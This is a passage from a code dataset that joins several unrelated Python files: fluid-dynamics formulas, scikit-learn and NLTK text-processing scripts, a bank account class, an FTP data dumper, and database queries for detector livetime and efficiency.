study_blocks]\n pp = pprint.PrettyPrinter(indent=4)\n # calculate the defaults first so calculate_values\n # can use the values from blocks that take in default\n default_vals = calculate_defaults(study_blocks)\n results = calculate_results(study_blocks, default_vals)\n pp.pprint(results)\n\n\ndef calculate_defaults(block):\n ''' Calculate defaults first so blocks that take in other blocks don't\n result in errors. '''\n default_dict = {}\n mach = block.fluid_props['mach']\n gamma = block.fluid_props['gamma']\n for key, value in block.parameters.items():\n if value['input'] == 'default':\n out_val = value['output'] # pressure, temp, density?\n out_type = value['out_type'] # ratio or value?\n stag_val = block.fluid_props[out_type]\n result = mach_map[out_val](mach, gamma, out_type, stag_val)\n default_dict[key] = result\n return default_dict\n\n\ndef calculate_results(block, results_dict):\n ''' Calculate the results for the rest of the blocks. '''\n results_dict = {}\n fluid_props = block.parameters\n gamma = fluid_props['gamma']\n for key, value in block.parameters.items():\n if value['input'] != 'default':\n out_val = value['output'] # pressure, temp, density?\n out_type = value['out_type'] # ratio or value?\n input_val = results_dict[key]\n stag_val = fluid_props[out_val]\n result = master_dispatch[out_val](\n stag_val, input_val, out_type, gamma)\n results_dict[key] = result\n return results_dict\n\n\ndef sonic_speed(gamma, gasConst, temp):\n return sqrt(gamma * gasConst * temp)\n\n\ndef pressure_ratio(mach, gamma, out_type, stag_val):\n base = (1 + 0.5 * (gamma - 1) * (mach ** 2))\n if out_type == 'ratio':\n return base ** -(gamma / (gamma - 1))\n elif out_type == 'value':\n return stag_val * (base ** -(gamma / (gamma - 1)))\n\n\ndef temp_ratio(mach, gamma, out_type, stag_val):\n base = (1 + 0.5 * (gamma - 1) * (mach ** 2))\n if out_type == 'ratio':\n return base ** -1\n elif out_type == 'value':\n return stag_val * (base ** -1)\n\n\ndef density_ratio(mach, gamma, out_type, stag_val):\n base = (1 + 0.5 * (gamma - 1) * (mach ** 2))\n if out_type == 'ratio':\n return base ** -(1 / (gamma - 1))\n elif out_type == 'value':\n return stag_val * (base ** -(1 / (gamma - 1)))\n\n\n# The functions below return the downstream value itself rather than a ratio\n\n\ndef press_from_dens(stag_press, inp, input_type, gamma):\n ''' Return pressure given density. '''\n if input_type == 'ratio':\n return inp ** gamma\n elif input_type == 'value':\n return stag_press * (inp ** gamma)\n\n\ndef press_from_temp(stag_press, inp, input_type, gamma):\n ''' Return pressure given temperature. '''\n if input_type == 'ratio':\n return inp ** (gamma / (gamma - 1))\n elif input_type == 'value':\n return stag_press * (inp ** (gamma / (gamma - 1)))\n\n\ndef dens_from_press(stag_density, inp, input_type, gamma):\n ''' Return density given pressure. '''\n if input_type == 'ratio':\n return inp ** (1 / gamma)\n elif input_type == 'value':\n return stag_density * (inp ** (1 / gamma))\n\n\ndef dens_from_temp(stag_density, inp, input_type, gamma):\n ''' Return density given pressure. '''\n if input_type == 'ratio':\n return inp ** (1 / (gamma - 1))\n elif input_type == 'value':\n return stag_density * (inp ** (1 / (gamma - 1)))\n\n\ndef temp_from_pressure(stag_temp, inp, input_type, gamma):\n ''' Return temperature given pressure. '''\n if input_type == 'ratio':\n return inp ** ((gamma - 1) / gamma)\n elif input_type == 'value':\n return stag_temp * (inp ** ((gamma - 1) / gamma))\n\n\ndef temp_from_dens(stag_temp, inp, input_type, gamma):\n ''' Return temperature given density. '''\n if input_type == 'ratio':\n return inp ** (gamma - 1)\n elif input_type == 'value':\n return stag_temp * (inp ** (gamma - 1))\n\n\n# Dictionary map of functions that take mach as a parameter\nmach_map = {\n 'pressure': pressure_ratio,\n 'density': density_ratio,\n 'temperature': temp_ratio\n}\n\n# Functions that take pressure as a parameter\npress_map = {\n 'density': press_from_dens,\n 'temperature': press_from_temp\n}\n\n# Functions that take temperature\ntemp_map = {\n 'pressure': temp_from_pressure,\n 'density': temp_from_dens\n}\n\n# Functions that take density\ndens_map = {\n 'pressure': dens_from_press,\n 'temperature': dens_from_temp\n}\n\n# master_dispatch organizes the function dictionaries according to\n# the input specified in the study file, from there the output\n# parameter can be passed into the functions in the dictionaries\n# input: output value\nmaster_dispatch = {\n 'mach': mach_map,\n 'pressure': press_map,\n 'temperature': temp_map,\n 'density': dens_map\n}\n","sub_path":"flow/isentropic.py","file_name":"isentropic.py","file_ext":"py","file_size_in_byte":5137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"299317580","text":"\"\"\"\n Import Module\n\"\"\"\n\nimport os\nfrom joblib import load, dump\nfrom sklearn.ensemble import RandomForestRegressor\nfrom src.Model import Model\nfrom sklearn.model_selection import GridSearchCV\n\n\nclass RandomForest(Model):\n \"\"\"\n RandomForest model class\n \"\"\"\n algorithm = 'RandomForest'\n\n # Default Tuning parameters\n default_parameters = {'n_estimators': [100],\n 'criterion': ['mse', 'mae'],\n 'max_depth': [None],\n 'min_samples_split': [2],\n 'min_samples_leaf': [1],\n 'min_weight_fraction_leaf': [0.],\n 'max_features': [None, 'auto', 'sqrt', 'log2'],\n 'max_leaf_nodes': [None],\n 'min_impurity_decrease': [0.],\n 'bootstrap': [True, False],\n 'oob_score': [True, False],\n 'n_jobs': [None],\n 'random_state': [None],\n 'verbose': [0],\n 'warm_start': [True, False],\n 'class_weight': ['balanced'],\n 'ccp_alpha': [0.0],\n 'max_samples': [None]\n }\n\n # Tuning parameters\n tuning_parameters = {}\n\n def __init__(self, grid_search=False, filename='personality.csv'):\n \"\"\"\n RandomForest class constructor\n\n @param grid_search: indicates whether classifier should be created\n with the grid search classifier\n \"\"\"\n super().__init__(self.get_classifier(grid_search), self.algorithm, filename, False)\n\n def get_classifier(self, grid_search):\n \"\"\"\n Function responsible for getting the model\n classifier. If already created it loads it from\n the respective file otherwise creates it.\n \"\"\"\n self.grid_search = grid_search\n\n if grid_search:\n if os.path.isfile('joblib/regression/GridSearchCV_' + self.algorithm + '.joblib'):\n clf = load('joblib/regression/GridSearchCV_' + self.algorithm + '.joblib')\n else:\n clf = GridSearchCV(RandomForestRegressor(), self.tuning_parameters)\n dump(clf, 'joblib/regression/GridSearchCV_' + self.algorithm + '.joblib')\n else:\n if os.path.isfile('joblib/regression/' + self.algorithm + '.joblib'):\n clf = load('joblib/regression/' + self.algorithm + '.joblib')\n else:\n clf = RandomForestRegressor()\n\n return clf\n\n def get_algorithm(self):\n \"\"\"\n Function responsible for retrieving the\n algorithm name\n @return: algorithm name\n \"\"\"\n return self.algorithm\n\n def get_algorithm_gs_param(self):\n \"\"\"\n Function responsible for retrieving the grid\n search parameters\n @return: grid search parameters\n \"\"\"\n return self.tuning_parameters\n\n def get_best_param(self):\n \"\"\"\n Function responsible for showing the best\n parameters for this specific algorithm\n @return:\n \"\"\"\n if self.grid_search:\n value = \"Best parameters for \" + self.algorithm + \" algorithm:\\n\"\n for param_name in self.tuning_parameters:\n value = value + param_name + \": \" + str(self.clf.best_params_[param_name]) + '\\n'\n\n return value\n","sub_path":"Second-Project/src/Regression/RandomForest.py","file_name":"RandomForest.py","file_ext":"py","file_size_in_byte":3505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"373397248","text":"# -*- coding: utf-8 -*- \r\n#%reset -f\r\n\"\"\"\r\n@author: Hiromasa Kaneko\r\n\"\"\"\r\n\r\n# Demonstration of GTM\r\n\r\n# settings\r\nshapeofmap = [10, 10]\r\nshapeofrbfcenters = [5, 5]\r\nvarianceofrbfs = 4\r\nlambdainemalgorithm = 0.001\r\nnumberofiterations = 300\r\ndesplayflag = 1\r\n\r\nfrom sklearn.datasets import load_iris\r\nfrom gtm import gtm\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.figure as figure\r\n\r\n# load an iris dataset\r\niris = load_iris()\r\n#inputdataset = pd.DataFrame(iris.data, columns=iris.feature_names)\r\ninputdataset = iris.data\r\ncolor = iris.target\r\n\r\n# autoscaling\r\ninputdataset = (inputdataset - inputdataset.mean(axis=0)) / inputdataset.std(axis=0,ddof=1)\r\n\r\n# construct GTM model\r\nmodel = gtm( shapeofmap, shapeofrbfcenters, varianceofrbfs, lambdainemalgorithm, numberofiterations, desplayflag)\r\nmodel.fit(inputdataset)\r\n\r\nif model.successflag:\r\n # calculate of responsibilities\r\n responsibilities = model.responsibility(inputdataset)\r\n \r\n # plot the mean of responsibilities\r\n means = responsibilities.dot( model.mapgrids )\r\n plt.figure(figsize=figure.figaspect(1))\r\n plt.scatter( means[:,0], means[:,1], c=color)\r\n plt.ylim(-1.1,1.1)\r\n plt.xlim(-1.1,1.1)\r\n plt.xlabel(\"z1 (mean)\")\r\n plt.ylabel(\"z2 (mean)\")\r\n plt.show()\r\n \r\n # plot the mode of responsibilities\r\n modes = model.mapgrids[responsibilities.argmax(axis=1), :]\r\n plt.figure(figsize=figure.figaspect(1))\r\n plt.scatter( modes[:,0], modes[:,1], c=color)\r\n plt.ylim(-1.1,1.1)\r\n plt.xlim(-1.1,1.1)\r\n plt.xlabel(\"z1 (mode)\")\r\n plt.ylabel(\"z2 (mode)\")\r\n plt.show()\r\n","sub_path":"Python/demo_gtm.py","file_name":"demo_gtm.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"384041832","text":"def dec_bic(n):\n res=0\n exp=0\n while n>0:\n if (n%10)==1 or (n%10)==0:\n res=res+((n%10)*(10**exp))\n exp=exp+1\n n=n/10\n return res\n\ndef contador(n):\n res=0\n db=dec_bic(n)\n while db>0:\n res=res+1\n db=db/10\n return res\n\ndef finalizar(n):\n res=0\n exp=contador(n)-1\n db=dec_bic(n)\n while db>0:\n if db!=0:\n res=res+((db%10)*(10**exp))\n exp=exp-1\n db=db/10\n\n return res\n","sub_path":"PYTHON/desencripta sistema base binario.py","file_name":"desencripta sistema base binario.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"287358513","text":"from pathlib import Path\n\n__all__ = ['task_jshat_app',\n 'task_jshat_app_watch']\n\n\nbuild_dir = Path('build/jshat/app')\n\n\ndef task_jshat_app():\n \"\"\"JsHat application - build all\"\"\"\n return {'actions': ['yarn run --silent build '\n '--config webpack.app.config.js'],\n 'task_dep': ['jshat_deps']}\n\n\ndef task_jshat_app_watch():\n \"\"\"JsHat application - build all on change\"\"\"\n return {'actions': ['yarn run --silent watch '\n '--config webpack.app.config.js'],\n 'task_dep': ['jshat_deps']}\n\n\n# def task_jshat_analyze():\n# \"\"\"JsHat - profile and analyze build\"\"\"\n# def analyze(args):\n# for name in args:\n# subprocess.run(['yarn', 'run', '--silent', 'analyze',\n# str(build_dir / f'{name}/{name}.js'),\n# str(build_dir / f'{name}/{name}.js.map')],\n# check=True)\n# return {'actions': [analyze],\n# 'pos_arg': 'args',\n# 'task_dep': ['jshat']}\n","sub_path":"src_py/hat/doit/hat_core/jshat/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"135313435","text":"######################\r\n#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n# By Galo\r\n######################\r\nimport os\r\nimport nltk\r\nfrom nltk.corpus import wordnet\r\nfrom nltk.stem import WordNetLemmatizer #词性还原\r\nfrom nltk.tokenize import sent_tokenize #分句\r\nfrom nltk.tokenize import word_tokenize #分词\r\nfrom nltk.corpus import stopwords #去停用词\r\nfrom nltk.stem import SnowballStemmer #词干提取\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer #TFIDF\r\nimport chardet #检测编码格式\r\nimport re #匹配去标点符号,特殊字符\r\n\r\n#nltk.download() #下载nltk的语料库\r\ncachedStopWords = stopwords.words(\"english\") #选用英文停用词词典\r\n\r\n\r\ndef read_files(path):\r\n # 读取语料文件夹下所有文件内容(此处为二进制文件)\r\n # 所有文件内文本组合成一个string存入all_text\r\n files= os.listdir(path) # 得到文件夹下的所有文件名称\r\n all_text = \"\"\r\n for file in files: # 遍历文件夹\r\n if not os.path.isdir(file): # 判断是否是文件夹,不是文件夹才打开\r\n with open(path+\"/\"+file, \"rb\") as f: # 二进制格式文件参数为rb\r\n text = f.read()\r\n encode_type = chardet.detect(text) # 检测编码格式\r\n if encode_type['encoding'] != None: # 排除不能解码的情况\r\n text = text.decode(encode_type['encoding']) # 进行相应解码,赋给原标识符(变量)\r\n print(file,'done.') # 标识文件读取完毕\r\n all_text = all_text + text\r\n return all_text\r\n\r\n\r\n'''\r\n#这一部分先分句后分词,后来实测没啥用好像,因为数据结构变复杂,所以舍弃了\r\n\r\nsentences = sent_tokenize(atheism)\r\n#分句,将文本拆分成句子级别\r\nwith open('C:\\\\Users\\\\Administrator\\\\Desktop\\\\Preprocessing\\\\sentences_atheism_sent_tokenize.txt', 'w',encoding='utf-8') as f:\r\n for sentence in sentences:\r\n f.write(str(sentence))\r\nprint('Sentences written.')\r\n\r\nwords = []\r\nfor sentence in sentences:\r\n sentence = re.sub(\"[+:\\.\\!\\/_,$%^*(+\\\"\\'<>]+|[+——!,。?、~@#¥%……&*()]+\", \" \", sentence)\r\n #去标点\r\n words.append(word_tokenize(sentence))\r\n #分词,对句子进行分词,tokenize的分词是句子级别的,需要对文本先进行分句,否则效果会很差???没看出效果有差啊\r\nwith open('C:\\\\Users\\\\Administrator\\\\Desktop\\\\Preprocessing\\\\words_atheism_word_tokenize.txt', 'w',encoding='utf-8') as f:\r\n for word in words:\r\n f.write(str(word))\r\nprint('Words written.')\r\n\r\nwordStoped = []\r\nfor word in words: #去停用词\r\n filtered = [w.lower() for w in word if (w.lower() not in cachedStopWords and len(w) > 2)]\r\n #去停用词+去长度小于3的单词+小写化\r\n wordStoped.append(filtered)\r\nwith open('C:\\\\Users\\\\Administrator\\\\Desktop\\\\Preprocessing\\\\words_atheism_word_tokenize_Stopped.txt', 'w',encoding='utf-8') as f:\r\n for wordSt in wordStoped:\r\n f.write(str(wordSt))\r\nprint('WordsStopped written.')\r\n'''\r\n\r\n\r\ndef word_tokenize_stopwords_removal(all_text):\r\n # 对整个文本进行分词,这里为不分句直接分词,并去停用词、标点、特殊字符、带符号单词\r\n # 返回处理结果list:word_stopped\r\n # atheism = re.sub(\"[+:\\.\\!\\/_,$%^*(+\\\"\\'<>=]+|[+——!,。?、~@#¥%……&*()]+\", \" \", atheism)\r\n # words = word_tokenize(atheism)\r\n # 分词前去掉符号标点和特殊字符,转化为空格,也可以先分词再去掉含标点的词,后者去掉的东西更多,这里采取后一种\r\n\r\n words = [word for word in word_tokenize(all_text) if (str.isalpha(word) is not False)]\r\n # 分词,同时直接去掉所有带符号的词,如邮箱后缀、hyphen连词、缩写等\r\n path_word_tokenize = 'C:\\\\Users\\\\Administrator\\\\Desktop\\\\Preprocessing\\\\words_atheism_word_tokenize.txt'\r\n # 存放上述分词处理结果的文本路径\r\n with open(path_word_tokenize, 'w',encoding='utf-8') as f:\r\n f.write(str(words))\r\n print('Words written.')\r\n\r\n word_stopped = [w.lower() for w in words if (w.lower() not in cachedStopWords and len(w) > 2 and str.isalpha(w) is not False)]\r\n # 小写化后去停用词+去长度小于3的单词+去数字和包含符号的单词如 2-year\r\n path_word_tokenize_stopped = 'C:\\\\Users\\\\Administrator\\\\Desktop\\\\Preprocessing\\\\words_atheism_word_tokenize_Stopped.txt'\r\n # 存放上述去停用词处理结果的文本路径\r\n with open(path_word_tokenize_stopped, 'w', encoding='utf-8') as f:\r\n f.write(str(word_stopped))\r\n print('WordsStopped written.')\r\n\r\n return word_stopped\r\n\r\n\r\ndef word_pos_tags(word_stopped):\r\n # 词性标注,返回以单词+词性标注为元组的list: pos_tags\r\n pos_tags = nltk.pos_tag(word_stopped)\r\n path_word_tokenize_stopped_pos_tag = \\\r\n 'C:\\\\Users\\\\Administrator\\\\Desktop\\\\Preprocessing\\\\words_atheism_word_tokenize_Stopped_postag.txt'\r\n # 存放词性标注处理结果的文本路径\r\n with open(path_word_tokenize_stopped_pos_tag, 'w', encoding='utf-8') as f:\r\n f.write(str(pos_tags))\r\n print('Pos_tags written.')\r\n return pos_tags\r\n\r\n\r\ndef get_wordnet_pos(treebank_tag):\r\n # 词性标注提取\r\n if treebank_tag.startswith('J'):\r\n return wordnet.ADJ\r\n elif treebank_tag.startswith('V'):\r\n return wordnet.VERB\r\n elif treebank_tag.startswith('N'):\r\n return wordnet.NOUN\r\n elif treebank_tag.startswith('R'):\r\n return wordnet.ADV\r\n else:\r\n return None\r\n\r\n\r\ndef lemmatize_string(pos_tags):\r\n # 词形还原后词干提取函数,返回还原后的单词list: res\r\n res = []\r\n lemmatizer = WordNetLemmatizer() # 初始化词形还原对象\r\n stemmer = SnowballStemmer(\"english\") # 选择语言,初始化词干提取对象\r\n for word, pos in pos_tags:\r\n wordnet_pos = get_wordnet_pos(pos) or wordnet.NOUN\r\n res.append(stemmer.stem(lemmatizer.lemmatize(word, pos=wordnet_pos)))\r\n return res\r\n\r\n\r\ndef do_lemma_stemmer(pos_tags):\r\n # 进行词形还原和词干提取,并输出记录结果\r\n # 返回仅由空格分隔单词的纯文本,即一个string的list: wordLemmatizedStemmeredWordOnly\r\n word_lemmatized_stemmered = lemmatize_string(pos_tags)\r\n path_word_tokenize_stopped_postag_lemmatized_stemmered_wordonly = \\\r\n 'C:\\\\Users\\\\Administrator\\\\Desktop\\\\Preprocessing\\\\words_atheism_word_tokenize_Stopped_postag_lemmatized_stemmered_wordonly.txt'\r\n # 存放词形还原和词干提取处理结果的文本路径\r\n with open(path_word_tokenize_stopped_postag_lemmatized_stemmered_wordonly, 'w', encoding='utf-8') as f:\r\n for word in word_lemmatized_stemmered:\r\n #sklearn中TFIDF计算需要的格式是仅由空格分隔单词的纯文本\r\n f.write(str(word))\r\n f.write(str(' '))\r\n print(\"WordLemmatized&Stemmered written.\")\r\n\r\n word_lemmatized_stemmered_wordonly = [] # 重读出所需格式文本\r\n with open('C:\\\\Users\\\\Administrator\\\\Desktop\\\\Preprocessing\\\\words_atheism_word_tokenize_Stopped_postag_lemmatized_stemmered_wordonly.txt', 'r',encoding='utf-8') as f:\r\n word_lemmatized_stemmered_wordonly.append(f.read())\r\n\r\n return word_lemmatized_stemmered_wordonly\r\n\r\n\r\ndef TFIDF(word_lemmatized_stemmered_wordonly):\r\n # TFIDF计算\r\n tf_idf = TfidfVectorizer() # 初始化对象\r\n tf_data = tf_idf.fit_transform(word_lemmatized_stemmered_wordonly) # 计算TFIDF值\r\n words = tf_idf.get_feature_names() # 取出所统计单词项\r\n TFIDF = dict() # 创建空字典\r\n path_TFIDF = 'C:\\\\Users\\\\Administrator\\\\Desktop\\\\Preprocessing\\\\words_atheism_word_tokenize_Stopped_postag_lemmatized_stemmered_TFIDF.txt'\r\n path_TFIDF_sorted = 'C:\\\\Users\\\\Administrator\\\\Desktop\\\\Preprocessing\\\\words_atheism_word_tokenize_Stopped_postag_lemmatized_stemmered_TFIDF_sorted.txt'\r\n\r\n with open(path_TFIDF, 'w', encoding='utf-8') as f:\r\n # 向文件写入TFIDF值\r\n for i in range(len(word_lemmatized_stemmered_wordonly)):\r\n for j in range(len(words)):\r\n if tf_data[i, j] > 1e-5:\r\n f.write(words[j] + ':' + str(tf_data[i, j]))\r\n f.write('\\n')\r\n TFIDF[str(words[j])] = tf_data[i, j]\r\n print(\"TFIDF written.\")\r\n\r\n TFIDFSorted = sorted(TFIDF.items(), key=lambda e: e[1], reverse=True)\r\n # 按TFIDF值大小排序\r\n\r\n with open(path_TFIDF_sorted, 'w', encoding='utf-8') as f:\r\n # 向文件写入排序后的TFIDF值\r\n for key in TFIDFSorted:\r\n f.write(str(key))\r\n f.write('\\n')\r\n print(\"TFIDF sorted written.\")\r\n\r\n return\r\n\r\n\r\nif __name__ == '__main__':\r\n path = \"C:\\\\Users\\\\Administrator\\\\Desktop\\\\Preprocessing\\\\20news-19997\\\\20_newsgroups\\\\alt.atheism\"\r\n # 待处理语料文件夹目录\r\n atheism = read_files(path)\r\n stopped_words = word_tokenize_stopwords_removal(atheism)\r\n pos_tags_word = word_pos_tags(stopped_words)\r\n TFIDF(do_lemma_stemmer(pos_tags_word))","sub_path":"Preprocessing.py","file_name":"Preprocessing.py","file_ext":"py","file_size_in_byte":9160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"1966756","text":"import datetime\nimport pytz\n\n\nclass Account:\n \"\"\"Simple account class w/ balance\"\"\"\n\n @staticmethod\n def _current_time():\n utc_time = datetime.datetime.utcnow()\n return pytz.utc.localize(utc_time)\n\n def __init__(self, name, balance):\n # name_prompt = input(\"Please enter your name: \")\n # balance_prompt = int(input(\"Please enter your initial deposit: $\"))\n self._name = name\n self.__balance = balance\n self._transaction_list = [(Account._current_time(), balance)]\n print(\"Account created for {} with an initial balance of ${}\".format(self._name, self.__balance))\n\n def deposit(self, amount):\n # amount = int(input(\"Enter you deposit amount: $\"))\n if amount > 0:\n print(\"Depositing ${}...\".format(amount))\n self.__balance += amount\n self._transaction_list.append((Account._current_time(), amount))\n self.show_balance()\n\n def withdraw(self, amount):\n # amount = int(input(\"Enter your withdraw amount: $\"))\n if 0 < amount <= self.__balance:\n print(\"Withdrawing ${}...\".format(amount))\n self.__balance -= amount\n self._transaction_list.append((Account._current_time(), -amount))\n else:\n print(\"You cannot withdraw more than your current balance: ${}\".format(self.__balance))\n self.show_balance()\n self.show_transactions()\n\n def show_balance(self):\n print(\"Balance is ${}\".format(self.__balance))\n\n def show_transactions(self):\n for date, amount in self._transaction_list:\n if amount > 0:\n tran_type = \"deposited\"\n else:\n tran_type = \"withdrawn\"\n amount *= -1\n print(\" ${} {} on {} (local time was {})\".format(amount, tran_type, date, date.astimezone()))\n\n# Create some humans with bank accounts:\n\n\nif __name__ == '__main__':\n # Open new account with inital deposit\n account1 = Account(input(\"Please enter your name: \"), int(input(\"Please enter your initial deposit: $\")))\n account1.__balance = 200\n\n # Make a deposit:\n account1.deposit(int(input(\"Please enter the amount you would like to deposit: $\")))\n\n # Make a withdraw that is less than current balance:\n account1.withdraw(int(input(\"Please enter the amount you would like to withdraw: $\")))\n\n","sub_path":"python_oop/accounts.py","file_name":"accounts.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"132385642","text":"import argparse\nimport os\nimport os.path\n\nimport biothings\nfrom biothings.dataload.dumper import FTPDumper\n\nfrom wdbiothings import config\nfrom wdbiothings.config import DATA_ARCHIVE_ROOT\n\nbiothings.config_for_app(config)\n\n\nclass InterproDumper(FTPDumper):\n SRC_NAME = \"interpro\"\n FTP_HOST = 'ftp.ebi.ac.uk'\n CWD_DIR = 'pub/databases/interpro/current'\n SRC_ROOT_FOLDER = os.path.join(DATA_ARCHIVE_ROOT, SRC_NAME)\n FILES = [\"interpro.xml.gz\", \"protein2ipr.dat.gz\"]\n\n SCHEDULE = \"0 4 * * 0\"\n\n def get_newest_info(self):\n release_folder = self.client.pwd()\n self.release = os.path.split(release_folder)[-1]\n\n def new_release_available(self):\n current_release = self.src_doc.get(\"release\")\n if not current_release or float(self.release) > float(current_release):\n self.logger.info(\"New release '%s' found\" % self.release)\n return True\n else:\n self.logger.debug(\"No new release found\")\n return False\n\n def create_todump_list(self, force=False):\n self.get_newest_info()\n self.to_dump = []\n for file in self.FILES:\n new_localfile = os.path.join(self.new_data_folder, file)\n current_localfile = os.path.join(self.current_data_folder, file) if self.current_data_folder else new_localfile\n if force or not os.path.exists(current_localfile) or self.new_release_available():\n self.to_dump.append({\"remote\": file, \"local\": new_localfile})\n else:\n print(\"Skipping: {}\".format(current_localfile))\n print(self.to_dump)\n\n\ndef main(force=False):\n dumper = InterproDumper()\n dumper.dump(force=False)\n dumper.create_todump_list()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='run interpro dumper')\n parser.add_argument('--force', action='store_true', help='force new download')\n args = parser.parse_args()\n main(force=args.force)\n","sub_path":"wdbiothings/contrib/interpro/dumper.py","file_name":"dumper.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"610207050","text":"# You are given a sorted array consisting of only integers where every element appears exactly twice,\n# except for one element which appears exactly once. Find this single element that appears only once.\n\n# Note: Your solution should run in O(log n) time and O(1) space.\n\n# Input: [1,1,2,3,3,4,4,8,8]\n# Output: 2\n\n# Input: [3,3,7,7,10,11,11]\n# Output: 10\n\ndef singleNonDuplicate(nums):\n low = 0\n high = len(nums)-1\n while low= b >= c or a >= c >= b:\n\tmaior = a\n\tif c >= b:\n\t\tmenor = b\n\telse:\n\t\tmenor = c\n\nelif b >= c >= a or b >= a >= c:\n\tmaior = b\n\tif a >= c:\n\t\tmenor = c\n\telse:\n\t\tmenor = a\n\nelif c >= a >= b or c >= b >= a:\n\tmaior = c\n\tif b >= a:\n\t\tmenor = a\n\telse:\n\t\tmenor = b\nelse :\n\tmaior = 'iguais'\n\tmenor = 'iguais' \n\t\n\n\nprint ('Maior numero é: ', maior)\nprint ('Menor numero é: ', menor)\n","sub_path":"Lista_II/questao05.py","file_name":"questao05.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"153088389","text":"\"\"\"Compute total dataset muon and multiplicity efficiencies and livetime.\"\"\"\nimport numpy as np\n\nfrom dyb_analysis import common\n\ndef daq_livetime_s(database, label):\n \"\"\"Return an array of DAQ livetimes ordered from EH1-AD1 to EH3-AD4.\"\"\"\n with common.get_db(database) as conn:\n cursor = conn.cursor()\n # Total DAQ Livetime\n cursor.execute('''\n SELECT\n SUM(Livetime_ns/Efficiency/1e9)\n FROM\n muon_rates\n NATURAL JOIN\n runs\n WHERE\n Label = ?\n GROUP BY\n Hall,\n DetNo\n ORDER BY\n Hall,\n DetNo\n ''',\n (label,)\n )\n livetimes_s = np.array(cursor.fetchall()).reshape(-1)\n return livetimes_s\n\ndef daq_livetime_days(database, label):\n \"\"\"Return an array of DAQ livetimes in days from EH1-AD1 to EH3-AD4.\"\"\"\n livetime_s = daq_livetime_s(database, label)\n return livetime_s/60/60/24\n\ndef unvetoed_livetime_s(database, label):\n \"\"\"Return an array of unvetoed livetimes ordered from EH1-AD1 to EH3-AD4.\"\"\"\n with common.get_db(database) as conn:\n cursor = conn.cursor()\n # Total DAQ Livetime\n cursor.execute('''\n SELECT\n SUM(Livetime_ns/1e9)\n FROM\n muon_rates\n NATURAL JOIN\n runs\n WHERE\n Label = ?\n GROUP BY\n Hall,\n DetNo\n ORDER BY\n Hall,\n DetNo\n ''',\n (label,)\n )\n livetimes_s = np.array(cursor.fetchall()).reshape(-1)\n return livetimes_s\n\ndef muon_efficiency(database, label):\n \"\"\"Return an array of muon efficiencies from EH1-AD1 to EH3-AD4.\"\"\"\n with common.get_db(database) as conn:\n cursor = conn.cursor()\n cursor.execute('''\n SELECT\n SUM(Livetime_ns)/SUM(Livetime_ns/Efficiency)\n FROM\n muon_rates\n NATURAL JOIN\n runs\n WHERE\n Label = ?\n GROUP BY\n Hall,\n DetNo\n ORDER BY\n Hall,\n DetNo\n ''',\n (label,)\n )\n muon_effs = np.array(cursor.fetchall()).reshape(-1)\n return muon_effs\n\ndef muon_total_counts(database, label):\n \"\"\"Return an array of muon counts from EH1-AD1 to EH3-AD4.\"\"\"\n with common.get_db(database) as conn:\n cursor = conn.cursor()\n cursor.execute('''\n SELECT\n SUM(`Count`)\n FROM\n muon_rates\n NATURAL JOIN\n runs\n WHERE\n Label = ?\n GROUP BY\n Hall,\n DetNo\n ORDER BY\n Hall,\n DetNo\n ''',\n (label,)\n )\n muon_counts = np.array(cursor.fetchall()).reshape(-1)\n return muon_counts\n\ndef muon_rate_Hz(database, label):\n \"\"\"Return an array of muon rates from EH1-AD1 to EH3-AD4.\"\"\"\n unvetoed_livetimes = unvetoed_livetime_s(database, label)\n counts = muon_total_counts(database, label)\n return counts / unvetoed_livetimes\n\ndef multiplicity_efficiency(database, label):\n \"\"\"Return an array of multiplicity efficiencies from EH1-AD1 to EH3-AD4.\"\"\"\n with common.get_db(database) as conn:\n cursor = conn.cursor()\n cursor.execute('''\n SELECT\n SUM(MultiplicityVetoEfficiency * Livetime_ns/Efficiency)/\n SUM(Livetime_ns/Efficiency)\n FROM\n singles_rates\n NATURAL JOIN\n runs\n INNER JOIN\n muon_rates\n USING (\n RunNo,\n DetNo,\n Label\n )\n WHERE\n Label = ?\n GROUP BY\n Hall,\n DetNo\n ORDER BY\n Hall,\n DetNo\n ''',\n (label,)\n )\n mult_effs = np.array(cursor.fetchall()).reshape(-1)\n return mult_effs\n\ndef singles_rate_Hz(database, label):\n \"\"\"Return an array of singles rates from EH1-AD1 to EH3-AD4.\"\"\"\n with common.get_db(database) as conn:\n cursor = conn.cursor()\n cursor.execute('''\n SELECT\n SUM(singles.Rate_Hz * Livetime_ns/Efficiency)/\n SUM(Livetime_ns/Efficiency)\n FROM\n singles_rates AS singles\n NATURAL JOIN\n runs\n INNER JOIN\n muon_rates\n USING (\n RunNo,\n DetNo,\n Label\n )\n WHERE\n Label = ?\n GROUP BY\n Hall,\n DetNo\n ORDER BY\n Hall,\n DetNo\n ''',\n (label,)\n )\n singles_rates = np.array(cursor.fetchall()).reshape(-1)\n return singles_rates\n\ndef coincidences_counts(database, label):\n \"\"\"Return an array of coincidence counts from EH1-AD1 to EH3-AD4.\"\"\"\n with common.get_db(database) as conn:\n cursor = conn.cursor()\n cursor.execute('''\n SELECT\n SUM(NumCoincidences)\n FROM\n num_coincidences_by_run\n NATURAL JOIN\n runs\n WHERE\n Label = ?\n GROUP BY\n 